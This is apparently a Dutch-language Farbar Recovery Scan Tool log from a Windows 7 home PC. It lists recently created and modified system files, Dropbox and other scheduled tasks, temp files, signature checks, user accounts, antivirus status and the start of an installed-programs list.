2016-01-30 15:23 - 2015-12-30 19:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:47 - 03993536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2016-01-30 15:23 - 2015-12-30 19:47 - 03938240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2016-01-30 15:23 - 2015-12-30 19:44 - 01311768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2016-01-30 15:23 - 2015-12-30 19:41 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2016-01-30 15:23 - 2015-12-30 19:41 - 00665088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2016-01-30 15:23 - 2015-12-30 19:41 - 00274944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2016-01-30 15:23 - 2015-12-30 19:41 - 00171520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2016-01-30 15:23 - 2015-12-30 19:41 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2016-01-30 15:23 - 2015-12-30 19:41 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2016-01-30 15:23 - 2015-12-30 19:41 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2016-01-30 15:23 - 2015-12-30 19:41 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2016-01-30 15:23 - 2015-12-30 19:40 - 00251392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2016-01-30 15:23 - 2015-12-30 19:40 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2016-01-30 15:23 - 2015-12-30 19:39 - 00259584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2016-01-30 15:23 - 2015-12-30 19:39 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2016-01-30 15:23 - 2015-12-30 19:39 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2016-01-30 15:23 - 2015-12-30 19:39 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2016-01-30 15:23 - 2015-12-30 19:38 - 00552960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2016-01-30 15:23 - 2015-12-30 19:38 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00686080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 18:57 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2016-01-30 15:23 - 2015-12-30 18:50 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2016-01-30 15:23 - 2015-12-30 18:49 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2016-01-30 15:23 - 2015-12-30 18:44 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2016-01-30 15:23 - 2015-12-30 18:43 - 00159232 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2016-01-30 15:23 - 2015-12-30 18:42 - 00290816 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2016-01-30 15:23 - 2015-12-30 18:42 - 00129024 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2016-01-30 15:23 - 2015-12-30 18:41 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2016-01-30 15:23 - 2015-12-30 18:41 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2016-01-30 15:23 - 2015-12-30 18:32 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2016-01-30 15:23 - 2015-12-30 18:32 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2016-01-30 15:23 - 2015-12-30 18:32 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2016-01-30 15:23 - 2015-12-30 18:32 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2016-01-30 15:23 - 2015-12-30 18:30 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2016-01-30 15:23 - 2015-12-30 18:30 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 18:30 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 18:30 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 18:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2016-01-30 15:23 - 2015-09-23 14:15 - 00460776 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
2016-01-30 15:23 - 2015-09-23 14:15 - 00299632 _____ (Microsoft Corporation) C:\Windows\system32\bcryptprimitives.dll
2016-01-30 15:23 - 2015-09-23 14:09 - 00251000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcryptprimitives.dll
2016-01-30 14:37 - 2015-10-13 17:41 - 00497664 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\afd.sys
2016-01-30 14:37 - 2015-10-13 17:40 - 00118272 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tdx.sys
2016-01-30 14:37 - 2015-06-15 22:45 - 03242496 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2016-01-30 14:37 - 2015-06-15 22:45 - 00504320 _____ (Microsoft Corporation) C:\Windows\system32\msihnd.dll
2016-01-30 14:37 - 2015-06-15 22:44 - 00128000 _____ (Microsoft Corporation) C:\Windows\system32\msiexec.exe
2016-01-30 14:37 - 2015-06-15 22:43 - 02364416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2016-01-30 14:37 - 2015-06-15 22:43 - 00337408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msihnd.dll
2016-01-30 14:37 - 2015-06-15 22:42 - 00073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msiexec.exe
2016-01-30 14:37 - 2015-06-15 22:42 - 00025088 _____ (Microsoft Corporation) C:\Windows\system32\msimsg.dll
2016-01-30 14:37 - 2015-06-15 22:37 - 00025088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msimsg.dll
2016-01-30 14:36 - 2015-10-29 18:50 - 00342016 _____ (Microsoft Corporation) C:\Windows\system32\apphelp.dll
2016-01-30 14:36 - 2015-10-29 18:50 - 00072192 _____ (Microsoft Corporation) C:\Windows\system32\aelupsvc.dll
2016-01-30 14:36 - 2015-10-29 18:50 - 00023552 _____ (Microsoft Corporation) C:\Windows\system32\sdbinst.exe
2016-01-30 14:36 - 2015-10-29 18:50 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\shimeng.dll
2016-01-30 14:36 - 2015-10-29 18:50 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shimeng.dll
2016-01-30 14:36 - 2015-10-29 18:49 - 00295936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apphelp.dll
2016-01-30 14:36 - 2015-10-29 18:49 - 00020992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sdbinst.exe
2016-01-30 14:36 - 2015-07-30 19:06 - 02565120 _____ (Microsoft Corporation) C:\Windows\system32\d3d10warp.dll
2016-01-30 14:36 - 2015-07-30 19:06 - 01648128 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2016-01-30 14:36 - 2015-07-30 19:06 - 01180160 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2016-01-30 14:36 - 2015-07-30 18:57 - 01987584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d10warp.dll
2016-01-30 14:36 - 2015-07-30 18:57 - 01251328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2016-01-30 14:35 - 2015-07-23 01:02 - 01390592 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll
2016-01-30 14:35 - 2015-07-23 01:02 - 00879104 _____ (Microsoft Corporation) C:\Windows\system32\tdh.dll
2016-01-30 14:35 - 2015-07-22 18:53 - 00635392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdh.dll
2016-01-30 14:35 - 2015-07-22 17:48 - 00041984 _____ (Microsoft Corporation) C:\Windows\system32\UtcResources.dll
2016-01-30 14:34 - 2015-11-03 20:04 - 00241664 _____ (Microsoft Corporation) C:\Windows\system32\els.dll
2016-01-30 14:34 - 2015-11-03 19:55 - 00179712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\els.dll
2016-01-30 14:34 - 2015-10-13 05:57 - 00950720 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndis.sys
2016-01-30 14:34 - 2015-10-01 19:00 - 00275456 _____ (Microsoft Corporation) C:\Windows\system32\InkEd.dll
2016-01-30 14:34 - 2015-10-01 18:50 - 00216064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InkEd.dll
2016-01-30 14:34 - 2015-07-09 18:57 - 00193536 _____ (Microsoft Corporation) C:\Windows\system32\notepad.exe
2016-01-30 14:34 - 2015-07-09 18:57 - 00193536 _____ (Microsoft Corporation) C:\Windows\notepad.exe
2016-01-30 14:34 - 2015-07-09 18:42 - 00179712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\notepad.exe
2016-01-30 14:34 - 2015-06-25 11:06 - 00115136 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe
2016-01-30 14:34 - 2015-06-25 11:01 - 01941504 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2016-01-30 14:34 - 2015-06-25 11:01 - 00070656 _____ (Microsoft Corporation) C:\Windows\system32\appinfo.dll
2016-01-30 14:34 - 2015-06-25 10:44 - 01805824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll
2016-01-30 14:34 - 2015-04-11 04:19 - 00069888 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\stream.sys
2016-01-30 14:31 - 2015-09-02 04:04 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll
2016-01-30 14:31 - 2015-09-02 04:04 - 00046080 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2016-01-30 14:31 - 2015-09-02 04:04 - 00041984 _____ (Microsoft Corporation) C:\Windows\system32\lpk.dll
2016-01-30 14:31 - 2015-09-02 04:04 - 00014336 _____ (Microsoft Corporation) C:\Windows\system32\dciman32.dll
2016-01-30 14:31 - 2015-09-02 03:48 - 00070656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontsub.dll
2016-01-30 14:31 - 2015-09-02 03:48 - 00034304 _____ (Adobe Systems) C:\Windows\SysWOW64\atmlib.dll
2016-01-30 14:31 - 2015-09-02 03:48 - 00010240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dciman32.dll
2016-01-30 14:31 - 2015-09-02 03:47 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\lpk.dll
2016-01-30 14:31 - 2015-09-02 02:47 - 00372736 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2016-01-30 14:31 - 2015-09-02 02:33 - 00299520 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\atmfd.dll
2016-01-30 14:31 - 2015-08-27 19:18 - 02004480 _____ (Microsoft Corporation) C:\Windows\system32\msxml6.dll
2016-01-30 14:31 - 2015-08-27 19:18 - 01887232 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2016-01-30 14:31 - 2015-08-27 19:13 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\msxml6r.dll
2016-01-30 14:31 - 2015-08-27 19:13 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\msxml3r.dll
2016-01-30 14:31 - 2015-08-27 18:58 - 01391104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml6.dll
2016-01-30 14:31 - 2015-08-27 18:58 - 01241088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll
2016-01-30 14:31 - 2015-08-27 18:51 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml6r.dll
2016-01-30 14:31 - 2015-08-27 18:51 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3r.dll
2016-01-30 13:02 - 2016-01-30 13:03 - 00048839 _____ C:\Users\Thomas\Downloads\BelastingdienstToeslagen.pdf
2016-01-30 12:53 - 2016-01-30 12:53 - 07635472 _____ (Microsoft Corporation) C:\Users\Thomas\Downloads\GetWindows10-Web_Default_Attr.exe
2016-01-30 12:45 - 2016-01-30 12:45 - 00690072 _____ (Dropbox, Inc.) C:\Users\Thomas\Downloads\DropboxInstaller (1).exe
2016-01-30 12:43 - 2016-01-31 11:58 - 00000000 ___RD C:\Users\Thomas\Documents\Dropbox
2016-01-30 12:43 - 2016-01-30 12:43 - 00001190 _____ C:\Users\Thomas\Desktop\Dropbox.lnk
2016-01-30 12:36 - 2016-01-30 12:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2016-01-30 12:34 - 2016-01-31 15:39 - 00001014 _____ C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job
2016-01-30 12:34 - 2016-01-31 12:39 - 00001010 _____ C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job
2016-01-30 12:34 - 2016-01-30 12:36 - 00000000 ____D C:\Program Files (x86)\Dropbox
2016-01-30 12:34 - 2016-01-30 12:34 - 00004010 _____ C:\Windows\System32\Tasks\DropboxUpdateTaskMachineUA
2016-01-30 12:34 - 2016-01-30 12:34 - 00003758 _____ C:\Windows\System32\Tasks\DropboxUpdateTaskMachineCore
2016-01-30 12:33 - 2016-01-30 12:33 - 00690072 _____ (Dropbox, Inc.) C:\Users\Thomas\Downloads\DropboxInstaller.exe
2016-01-30 12:16 - 2016-01-31 11:55 - 00000000 ____D C:\Users\Thomas\AppData\Local\Dropbox
2016-01-30 12:16 - 2016-01-30 12:16 - 00000000 ____D C:\ProgramData\Dropbox

==================== Een Maand Gewijzigd bestanden en mappen ========

(Als een item is opgenomen in de fixlist, het bestand/map wordt verplaatst.)

2016-01-31 15:52 - 2010-11-08 19:06 - 00000000 ___RD C:\Users\Thomas\Documents\My Dropbox
2016-01-31 15:34 - 2012-01-27 23:44 - 00001056 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-01-31 15:18 - 2012-04-10 09:22 - 00000940 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-01-31 14:55 - 2012-07-17 19:50 - 00000932 _____ C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1460008453-1702061876-2463211388-1000UA.job
2016-01-31 14:34 - 2012-01-27 23:44 - 00001052 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-01-31 12:37 - 2009-07-14 05:45 - 00023248 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-01-31 12:37 - 2009-07-14 05:45 - 00023248 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-01-31 11:52 - 2009-07-14 06:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-01-30 21:57 - 2010-01-09 20:31 - 00815130 _____ C:\Windows\system32\perfh013.dat
2016-01-30 21:57 - 2010-01-09 20:31 - 00180230 _____ C:\Windows\system32\perfc013.dat
2016-01-30 21:57 - 2009-07-14 06:13 - 01865776 _____ C:\Windows\system32\PerfStringBackup.INI
2016-01-30 21:57 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\inf
2016-01-30 21:55 - 2014-10-03 12:30 - 00000000 ___RD C:\Users\Farah\Dropbox
2016-01-30 21:55 - 2014-10-03 12:28 - 00000000 ____D C:\Users\Farah\AppData\Roaming\Dropbox
2016-01-30 21:54 - 2014-10-03 12:30 - 00001190 _____ C:\Users\Farah\Desktop\Dropbox.lnk
2016-01-30 21:50 - 2009-07-14 05:45 - 00458400 _____ C:\Windows\system32\FNTCACHE.DAT
2016-01-30 21:10 - 2015-03-28 23:07 - 00000000 ___SD C:\Windows\SysWOW64\GWX
2016-01-30 21:10 - 2015-03-28 23:07 - 00000000 ___SD C:\Windows\system32\GWX
2016-01-30 21:10 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\PolicyDefinitions
2016-01-30 21:02 - 2011-01-31 12:52 - 01840444 _____ C:\Windows\SysWOW64\PerfStringBackup.INI
2016-01-30 20:55 - 2012-07-17 19:50 - 00000910 _____ C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1460008453-1702061876-2463211388-1000Core.job
2016-01-30 20:40 - 2012-07-06 22:00 - 00000000 ____D C:\Users\Thomas\AppData\Roaming\vlc
2016-01-30 17:27 - 2015-04-12 12:25 - 00000000 ____D C:\Windows\system32\appraiser
2016-01-30 17:27 - 2014-04-24 21:24 - 00000000 ___SD C:\Windows\system32\CompatTel
2016-01-30 16:59 - 2009-07-14 03:34 - 00000828 _____ C:\Windows\win.ini
2016-01-30 16:39 - 2010-08-13 09:49 - 00000000 ____D C:\Users\Thomas
2016-01-30 14:51 - 2011-04-18 19:23 - 00000000 ____D C:\Users\Thomas\AppData\Local\Google
2016-01-30 13:59 - 2015-12-30 18:12 - 00000000 ____D C:\Users\Thomas\AppData\Local\Battle.net
2016-01-30 13:58 - 2015-12-30 18:11 - 00000000 ____D C:\Program Files (x86)\Battle.net
2016-01-30 12:35 - 2015-12-30 18:17 - 00002192 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-01-30 12:35 - 2015-12-30 18:17 - 00002163 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-01-30 12:31 - 2010-11-08 19:05 - 00000000 ____D C:\Users\Thomas\AppData\Roaming\Dropbox
2016-01-30 12:27 - 2010-01-09 12:38 - 00000000 ____D C:\ProgramData\Temp
2016-01-30 12:12 - 2010-09-02 22:20 - 00000000 ____D C:\Program Files (x86)\SpywareBlaster

==================== Bestanden in de root van sommige mappen =======

2014-11-19 23:30 - 2014-11-19 23:35 - 6000640 _____ () C:\Program Files (x86)\GUT609.tmp
2010-08-14 21:25 - 2010-11-16 23:30 - 0000352 _____ () C:\Users\Thomas\AppData\Roaming\wklnhst.dat
2010-08-13 10:00 - 2010-08-13 10:00 - 0000000 _____ () C:\Users\Thomas\AppData\Local\AtStart.txt
2015-12-19 14:20 - 2015-12-19 14:20 - 0000000 ____H () C:\Users\Thomas\AppData\Local\BITAF52.tmp
2010-08-13 10:00 - 2010-08-13 10:00 - 0000000 _____ () C:\Users\Thomas\AppData\Local\DSwitch.txt
2010-08-13 10:00 - 2010-08-13 10:00 - 0000000 _____ () C:\Users\Thomas\AppData\Local\QSwitch.txt
2010-11-02 00:47 - 2010-11-02 00:47 - 0000017 _____ () C:\Users\Thomas\AppData\Local\resmon.resmoncfg
2011-08-26 10:08 - 2011-08-26 10:08 - 0001892 _____ () C:\Users\Thomas\AppData\Local\Temp1.html
2011-08-26 10:09 - 2011-08-26 10:09 - 0020316 _____ () C:\Users\Thomas\AppData\Local\Temp15.html
2015-12-19 14:20 - 2015-12-19 14:20 - 0000000 _____ () C:\Users\Thomas\AppData\Local\{DC0B4DB1-A5EB-4CF1-A01B-0882609F4995}
2011-02-03 14:56 - 2011-02-03 15:34 - 0000024 _____ () C:\ProgramData\anwblog2010.cfg
2010-08-13 10:00 - 2011-05-04 11:24 - 0000181 _____ () C:\ProgramData\HPWALog.txt
2010-08-22 17:54 - 2010-08-22 18:21 - 0001423 _____ () C:\ProgramData\hpzinstall.log
2010-08-15 01:20 - 2012-08-08 20:46 - 0000900 ___SH () C:\ProgramData\KGyGaAvL.sys
2010-03-17 01:47 - 2010-03-17 01:47 - 0000032 _____ () C:\ProgramData\{051B9612-4D82-42AC-8C63-CD2DCEDC1CB3}.log
2010-01-09 13:27 - 2010-01-09 13:27 - 0000109 _____ () C:\ProgramData\{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}.log
2010-03-17 01:47 - 2010-03-17 01:47 - 0000032 _____ () C:\ProgramData\{23F3DA62-2D9E-4A69-B8D5-BE8E9E148092}.log
2010-01-09 13:22 - 2010-01-09 13:23 - 0000105 _____ () C:\ProgramData\{40BF1E83-20EB-11D8-97C5-0009C5020658}.log
2010-03-17 01:46 - 2010-03-17 01:46 - 0000032 _____ () C:\ProgramData\{4FC670EB-5F02-4B07-90DB-022B86BFEFD0}.log
2010-03-17 01:47 - 2010-03-17 01:47 - 0000032 _____ () C:\ProgramData\{9867824A-C86D-4A83-8F3C-E7A86BE0AFD3}.log
2010-01-09 13:21 - 2010-01-09 13:22 - 0000107 _____ () C:\ProgramData\{C59C179C-668D-49A9-B6EA-0121CCFC1243}.log
2010-01-09 13:23 - 2010-01-09 13:27 - 0000110 _____ () C:\ProgramData\{CB099890-1D5F-11D5-9EA9-0050BAE317E1}.log
2010-03-17 01:47 - 2010-03-17 01:47 - 0000105 _____ () C:\ProgramData\{d36dd326-7280-11d8-97c8-000129760cbe}.log

Sommige bestanden in TEMP:
====================
C:\Users\Farah\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpoakndh.dll
C:\Users\Thomas\AppData\Local\Temp\drm_dialogs.dll
C:\Users\Thomas\AppData\Local\Temp\drm_dyndata_7330014.dll
C:\Users\Thomas\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmplxbs1h.dll
C:\Users\Thomas\AppData\Local\Temp\GUR8D6.exe
C:\Users\Thomas\AppData\Local\Temp\SkypeSetup.exe


==================== Bamital & volsnap =================

(Er is geen automatische fix voor bestanden die de verificatie niet doorkomen.)

C:\Windows\system32\winlogon.exe => Bestand is getekend
C:\Windows\system32\wininit.exe => Bestand is getekend
C:\Windows\SysWOW64\wininit.exe => Bestand is getekend
C:\Windows\explorer.exe => Bestand is getekend
C:\Windows\SysWOW64\explorer.exe => Bestand is getekend
C:\Windows\system32\svchost.exe => Bestand is getekend
C:\Windows\SysWOW64\svchost.exe => Bestand is getekend
C:\Windows\system32\services.exe => Bestand is getekend
C:\Windows\system32\User32.dll => Bestand is getekend
C:\Windows\SysWOW64\User32.dll => Bestand is getekend
C:\Windows\system32\userinit.exe => Bestand is getekend
C:\Windows\SysWOW64\userinit.exe => Bestand is getekend
C:\Windows\system32\rpcss.dll => Bestand is getekend
C:\Windows\system32\dnsapi.dll => Bestand is getekend
C:\Windows\SysWOW64\dnsapi.dll => Bestand is getekend
C:\Windows\system32\Drivers\volsnap.sys => Bestand is getekend


LastRegBack: 2015-04-01 22:30

==================== Eind van FRST.txt ============================

 

Addition:

Extra scanresultaten van Farbar Recovery Scan Tool (x64) Versie:27-01-2016
Gestart door Thomas (2016-01-31 15:54:34)
Gestart vanaf C:\Users\Thomas\Desktop
Windows 7 Home Premium Service Pack 1 (X64) (2010-08-13 08:49:20)
Boot Modus: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1460008453-1702061876-2463211388-500 - Administrator - Disabled)
Farah (S-1-5-21-1460008453-1702061876-2463211388-1009 - Limited - Enabled) => C:\Users\Farah
Gast (S-1-5-21-1460008453-1702061876-2463211388-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1460008453-1702061876-2463211388-1002 - Limited - Enabled)
Thomas (S-1-5-21-1460008453-1702061876-2463211388-1000 - Administrator - Enabled) => C:\Users\Thomas

==================== Security Center ========================

(Als een item is opgenomen in de fixlist, zal het worden verwijderd.)

AV: Microsoft Security Essentials (Enabled - Up to date) {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}
AS: Microsoft Security Essentials (Enabled - Up to date) {0C8D1929-27B2-688D-E114-9117BD2BB1B7}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Geïnstalleerde programma's ======================

(Alleen de adware-programma's met 'verborgen' vlag zou kunnen worden toegevoegd aan de fixlist om ze zichtbaar te maken. De adware-programma's moeten handmatig gedeinstallerd worden.)

µTorrent (HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\uTorrent) (Version: 3.4.2.37754 - BitTorrent Inc.)
64 Bit HP CIO Components Installer (Version: 6.2.1 - Hewlett-Packard) Hidden
